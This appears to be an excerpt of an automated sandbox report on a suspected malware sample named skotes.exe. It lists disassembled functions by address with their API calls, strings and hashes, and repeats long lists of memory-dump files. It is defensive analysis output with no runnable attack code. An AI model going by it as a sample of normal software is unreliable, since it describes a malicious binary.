String ID: 6C$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-1188627148
Opcode ID: d0e8c281dfc6d1f412613164bd9efb51d98ae240c17895e78a9a154765278f4b
Instruction ID: 8521ce7b54ce1291b0da88f21dbceae1c8130e0215ef7e94c857a09aed5338a2
Opcode Fuzzy Hash: d0e8c281dfc6d1f412613164bd9efb51d98ae240c17895e78a9a154765278f4b
Instruction Fuzzy Hash: D621F87150511D7FDB38AF678C80E6B77BDEF08368F10551AF91496282E768EC005799

Function 0042AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 0042AEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042AF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042AF4E

Strings

pExecutionResource, xrefs: 0042AF07

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 74171e5d1a266166b4d03f55ab7615eb227bfc2a0f10f3f2d3d9b89eca2c636e
Instruction ID: fa6d3a0e3725f8ef027d180f71de552ac3c936f12b730e52bc2201ef4983df17
Opcode Fuzzy Hash: 74171e5d1a266166b4d03f55ab7615eb227bfc2a0f10f3f2d3d9b89eca2c636e
Instruction Fuzzy Hash: 9A21A9B5B403059BCB04EF55C882BED77A5BF48314F50405FE90167382DB78AE55CB99

Function 00424EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00424F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00424F66

Strings

ppVirtualProcessorRoots, xrefs: 00424F1C
count, xrefs: 00424EBA

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: b8f6e9775489eb43db2291f0627f676f8f7451052afbdeb1257d0075ae90704d
Instruction ID: 0fe100e528eb00baa15785fa13c2d5db46de6353967fcf2c4de188508199a33a
Opcode Fuzzy Hash: b8f6e9775489eb43db2291f0627f676f8f7451052afbdeb1257d0075ae90704d
Instruction Fuzzy Hash: 43210034B00224EFCB04EF99D881EAD73A0FF88315F40406FE40697692CB74AE01CB58

Function 0042B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0042BA0E

Strings

RoUninitialize, xrefs: 0042B9C1
RoInitialize, xrefs: 0042B998
combase.dll, xrefs: 0042B983, 0042B988, 0042B99D, 0042B9C8

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: 26c178ed7d63128c433f75bd94ce6c0970fd1336b3dbd5a4f6ed2503e4aacc8a
Instruction ID: 7a031b41f8034fde95ab7d8643b32c4d6e3e855650a90f24f8b1432ac9a3cda4
Opcode Fuzzy Hash: 26c178ed7d63128c433f75bd94ce6c0970fd1336b3dbd5a4f6ed2503e4aacc8a
Instruction Fuzzy Hash: BE01C46164162569EB11B7B37C01BAB329C9F0174CF60582BE940E7292EB6DE80056EE

Function 00426E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 00426E73

Part of subcall function 00424E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424E7F
Part of subcall function 00424E6E: List.LIBCMT ref: 00424E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426EAA

Strings

eventObject, xrefs: 00426E7D

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: 344992d5d41c9de8337d43620d14b18e7efbb6e56ec4aed1dc2ddaadcd2b3b10
Instruction ID: 77bd04003194e704f686c3292e87c6fa9c675543d6065a09517380021f359b9d
Opcode Fuzzy Hash: 344992d5d41c9de8337d43620d14b18e7efbb6e56ec4aed1dc2ddaadcd2b3b10
Instruction Fuzzy Hash: A1110275640228E6DB24EBA5DC82FEF77686F00708FA1415BF504A61C2EB38AE04C67D

Function 0042A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A139

Strings

pScheduler, xrefs: 0042A131

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
